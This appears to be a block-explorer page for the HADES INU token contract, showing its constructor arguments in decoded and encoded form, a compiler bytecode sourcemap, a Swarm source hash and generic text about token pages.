Arg [0] : name_ (string): HADES INU
Arg [1] : symbol_ (string): HADES
Arg [2] : decimals_ (uint8): 9
Arg [3] : currOwnershipAddr (address): 0x52Ae9676174176b50c6d24795a20F5c04B4f0EDC
Arg [4] : totalSupply_ (uint256): 1000000000000000000
-----Encoded View---------------
9 Constructor Arguments found :
Arg [0] : 00000000000000000000000000000000000000000000000000000000000000a0
Arg [1] : 00000000000000000000000000000000000000000000000000000000000000e0
Arg [2] : 0000000000000000000000000000000000000000000000000000000000000009
Arg [3] : 00000000000000000000000052ae9676174176b50c6d24795a20f5c04b4f0edc
Arg [4] : 0000000000000000000000000000000000000000000000000de0b6b3a7640000
Arg [5] : 0000000000000000000000000000000000000000000000000000000000000009
Arg [6] : 484144455320494e550000000000000000000000000000000000000000000000
Arg [7] : 0000000000000000000000000000000000000000000000000000000000000005
Arg [8] : 4841444553000000000000000000000000000000000000000000000000000000
Deployed Bytecode Sourcemap
13797:5860:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14658:91;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;15693:210;;;;;;:::i;:::-;;:::i;:::-;;;2089:14:1;;2082:22;2064:41;;2052:2;2037:18;15693:210:0;2019:92:1;14959:108:0;15047:12;;14959:108;;;6028:25:1;;;6016:2;6001:18;14959:108:0;5983:76:1;15911:455:0;;;;;;:::i;:::-;;:::i;17859:314::-;;;;;;:::i;:::-;;:::i;:::-;;14860:91;14934:9;;14860:91;;14934:9;;;;6206:36:1;;6194:2;6179:18;14860:91:0;6161:87:1;16374:300:0;;;;;;:::i;:::-;;:::i;15075:177::-;;;;;;:::i;:::-;-1:-1:-1;;;;;15226:18:0;15194:7;15226:18;;;:9;:18;;;;;;;15075:177;5591:94;;;:::i;4940:87::-;4986:7;5013:6;4940:87;;-1:-1:-1;;;;;5013:6:0;;;1862:51:1;;1850:2;1835:18;4940:87:0;1817:102:1;14757:95:0;;;:::i;16682:401::-;;;;;;:::i;:::-;;:::i;15260:216::-;;;;;;:::i;:::-;;:::i;15484:201::-;;;;;;:::i;:::-;-1:-1:-1;;;;;15650:18:0;;;15618:7;15650:18;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;15484:201;5840:192;;;;;;:::i;:::-;;:::i;14658:91::-;14703:13;14736:5;14729:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;14658:91;:::o;15693:210::-;15812:4;15834:39;3738:10;15857:7;15866:6;15834:8;:39::i;:::-;-1:-1:-1;15891:4:0;15693:210;;;;:::o;15911:455::-;16051:4;16068:36;16078:6;16086:9;16097:6;16068:9;:36::i;:::-;16115:221;16138:6;3738:10;16186:139;16242:6;16186:139;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;16186:19:0;;;;;;:11;:19;;;;;;;;3738:10;16186:33;;;;;;;;;;:37;:139::i;:::-;16115:8;:221::i;:::-;-1:-1:-1;16354:4:0;15911:455;;;;;:::o;17859:314::-;17144:8;;-1:-1:-1;;;;;17144:8:0;3738:10;17144:24;17126:74;;;;-1:-1:-1;;;17126:74:0;;5324:2:1;17126:74:0;;;5306:21:1;5363:2;5343:18;;;5336:30;5402:29;5382:18;;;5375:57;5449:18;;17126:74:0;;;;;;;;;18020:1:::1;18010:6;:11;;;;17988:104;;;::::0;-1:-1:-1;;;17988:104:0;;3740:2:1;17988:104:0::1;::::0;::::1;3722:21:1::0;3779:2;3759:18;;;3752:30;3818:34;3798:18;;;3791:62;-1:-1:-1;;;3869:18:1;;;3862:41;3920:19;;17988:104:0::1;3712:233:1::0;17988:104:0::1;18103:13;18155:10;18103:13:::0;18155:2;:10:::1;:::i;:::-;-1:-1:-1::0;;;;;18131:21:0;;::::1;;::::0;;;:9:::1;:21;::::0;;;;:34;;;;-1:-1:-1;;;17859:314:0:o;16374:300::-;3738:10;16489:4;16583:25;;;:11;:25;;;;;;;;-1:-1:-1;;;;;16583:34:0;;;;;;;;;;16489:4;;16511:133;;16561:7;;16583:50;;16622:10;16583:38;:50::i;5591:94::-;4986:7;5013:6;-1:-1:-1;;;;;5013:6:0;3738:10;5160:23;5152:68;;;;-1:-1:-1;;;5152:68:0;;4152:2:1;5152:68:0;;;4134:21:1;;;4171:18;;;4164:30;4230:34;4210:18;;;4203:62;4282:18;;5152:68:0;4124:182:1;5152:68:0;5656:21:::1;5674:1;5656:9;:21::i;:::-;5591:94::o:0;14757:95::-;14804:13;14837:7;14830:14;;;;;:::i;16682:401::-;16802:4;16824:229;3738:10;16874:7;16896:146;16953:15;16896:146;;;;;;;;;;;;;;;;;3738:10;16896:25;;;;:11;:25;;;;;;;;-1:-1:-1;;;;;16896:34:0;;;;;;;;;;;;:38;:146::i;15260:216::-;15382:4;15404:42;3738:10;15428:9;15439:6;15404:9;:42::i;5840:192::-;4986:7;5013:6;-1:-1:-1;;;;;5013:6:0;3738:10;5160:23;5152:68;;;;-1:-1:-1;;;5152:68:0;;4152:2:1;5152:68:0;;;4134:21:1;;;4171:18;;;4164:30;4230:34;4210:18;;;4203:62;4282:18;;5152:68:0;4124:182:1;5152:68:0;-1:-1:-1;;;;;5929:22:0;::::1;5921:73;;;::::0;-1:-1:-1;;;5921:73:0;;3333:2:1;5921:73:0::1;::::0;::::1;3315:21:1::0;3372:2;3352:18;;;3345:30;3411:34;3391:18;;;3384:62;-1:-1:-1;;;3462:18:1;;;3455:36;3508:19;;5921:73:0::1;3305:228:1::0;5921:73:0::1;6005:19;6015:8;6005:9;:19::i;:::-;5840:192:::0;:::o;9026:98::-;9084:7;9111:5;9115:1;9111;:5;:::i;:::-;9104:12;9026:98;-1:-1:-1;;;9026:98:0:o;19033:382::-;-1:-1:-1;;;;;19169:19:0;;19161:69;;;;-1:-1:-1;;;19161:69:0;;4918:2:1;19161:69:0;;;4900:21:1;4957:2;4937:18;;;4930:30;4996:34;4976:18;;;4969:62;-1:-1:-1;;;5047:18:1;;;5040:35;5092:19;;19161:69:0;4890:227:1;19161:69:0;-1:-1:-1;;;;;19249:21:0;;19241:69;;;;-1:-1:-1;;;19241:69:0;;5680:2:1;19241:69:0;;;5662:21:1;5719:2;5699:18;;;5692:30;5758:34;5738:18;;;5731:62;-1:-1:-1;;;5809:18:1;;;5802:33;5852:19;;19241:69:0;5652:225:1;19241:69:0;-1:-1:-1;;;;;19323:18:0;;;;;;;:11;:18;;;;;;;;:27;;;;;;;;;;;;;:36;;;19375:32;;6028:25:1;;;19375:32:0;;6001:18:1;19375:32:0;;;;;;;;19033:382;;;:::o;17238:613::-;-1:-1:-1;;;;;17378:20:0;;17370:71;;;;-1:-1:-1;;;17370:71:0;;2926:2:1;17370:71:0;;;2908:21:1;2965:2;2945:18;;;2938:30;3004:34;2984:18;;;2977:62;-1:-1:-1;;;3055:18:1;;;3048:36;3101:19;;17370:71:0;2898:228:1;17370:71:0;-1:-1:-1;;;;;17460:23:0;;17452:72;;;;-1:-1:-1;;;17452:72:0;;4513:2:1;17452:72:0;;;4495:21:1;4552:2;4532:18;;;4525:30;4591:34;4571:18;;;4564:62;-1:-1:-1;;;4642:18:1;;;4635:34;4686:19;;17452:72:0;4485:226:1;17452:72:0;17617:109;17653:6;17617:109;;;;;;;;;;;;;;;;;-1:-1:-1;;;;;17617:17:0;;;;;;:9;:17;;;;;;;:109;:21;:109::i;:::-;-1:-1:-1;;;;;17597:17:0;;;;;;;:9;:17;;;;;;:129;;;;17760:20;;;;;;;:32;;17785:6;17760:24;:32::i;:::-;-1:-1:-1;;;;;17737:20:0;;;;;;;:9;:20;;;;;;;:55;;;;17808:35;;;;;;;;;;17836:6;6028:25:1;;6016:2;6001:18;;5983:76;11305:240:0;11425:7;11486:12;11478:6;;;;11470:29;;;;-1:-1:-1;;;11470:29:0;;;;;;;;:::i;:::-;-1:-1:-1;;;11521:5:0;;;11305:240::o;6040:173::-;6096:16;6115:6;;-1:-1:-1;;;;;6132:17:0;;;-1:-1:-1;;;;;;6132:17:0;;;;;;6165:40;;6115:6;;;;;;;6165:40;;6096:16;6165:40;6040:173;;:::o;14::1:-;82:20;;-1:-1:-1;;;;;131:31:1;;121:42;;111:2;;177:1;174;167:12;111:2;63:124;;;:::o;192:196::-;251:6;304:2;292:9;283:7;279:23;275:32;272:2;;;325:6;317;310:22;272:2;353:29;372:9;353:29;:::i;393:270::-;461:6;469;522:2;510:9;501:7;497:23;493:32;490:2;;;543:6;535;528:22;490:2;571:29;590:9;571:29;:::i;:::-;561:39;;619:38;653:2;642:9;638:18;619:38;:::i;:::-;609:48;;480:183;;;;;:::o;668:338::-;745:6;753;761;814:2;802:9;793:7;789:23;785:32;782:2;;;835:6;827;820:22;782:2;863:29;882:9;863:29;:::i;:::-;853:39;;911:38;945:2;934:9;930:18;911:38;:::i;:::-;901:48;;996:2;985:9;981:18;968:32;958:42;;772:234;;;;;:::o;1011:264::-;1079:6;1087;1140:2;1128:9;1119:7;1115:23;1111:32;1108:2;;;1161:6;1153;1146:22;1108:2;1189:29;1208:9;1189:29;:::i;:::-;1179:39;1265:2;1250:18;;;;1237:32;;-1:-1:-1;;;1098:177:1:o;1280:431::-;1355:6;1363;1371;1424:2;1412:9;1403:7;1399:23;1395:32;1392:2;;;1445:6;1437;1430:22;1392:2;1473:29;1492:9;1473:29;:::i;:::-;1463:39;;1552:2;1541:9;1537:18;1524:32;1596:4;1589:5;1585:16;1578:5;1575:27;1565:2;;1621:6;1613;1606:22;1565:2;1382:329;;1649:5;;-1:-1:-1;;;1701:2:1;1686:18;;;;1673:32;;1382:329::o;2116:603::-;2228:4;2257:2;2286;2275:9;2268:21;2318:6;2312:13;2361:6;2356:2;2345:9;2341:18;2334:34;2386:4;2399:140;2413:6;2410:1;2407:13;2399:140;;;2508:14;;;2504:23;;2498:30;2474:17;;;2493:2;2470:26;2463:66;2428:10;;2399:140;;;2557:6;2554:1;2551:13;2548:2;;;2627:4;2622:2;2613:6;2602:9;2598:22;2594:31;2587:45;2548:2;-1:-1:-1;2703:2:1;2682:15;-1:-1:-1;;2678:29:1;2663:45;;;;2710:2;2659:54;;2237:482;-1:-1:-1;;;2237:482:1:o;6253:229::-;6293:3;6324:1;6320:6;6317:1;6314:13;6311:2;;;-1:-1:-1;;;6350:33:1;;6406:4;6403:1;6396:15;6436:4;6357:3;6424:17;6311:2;-1:-1:-1;6467:9:1;;6301:181::o;6487:380::-;6566:1;6562:12;;;;6609;;;6630:2;;6684:4;6676:6;6672:17;6662:27;;6630:2;6737;6729:6;6726:14;6706:18;6703:38;6700:2;;;6783:10;6778:3;6774:20;6771:1;6764:31;6818:4;6815:1;6808:15;6846:4;6843:1;6836:15;6700:2;;6542:325;;;:::o
Swarm Source
ipfs://f1e033ea734e29f746c67d57700e31982b7a7a6d0b4d13e5f9dbafd744da6f54
Loading...
Loading
Loading...
Loading
[ Download: CSV Export ]
[ Download: CSV Export ]
A token is a representation of an on-chain or off-chain asset. The token page shows information such as price, total supply, holders, transfers and social links. Learn more about this page in our Knowledge Base.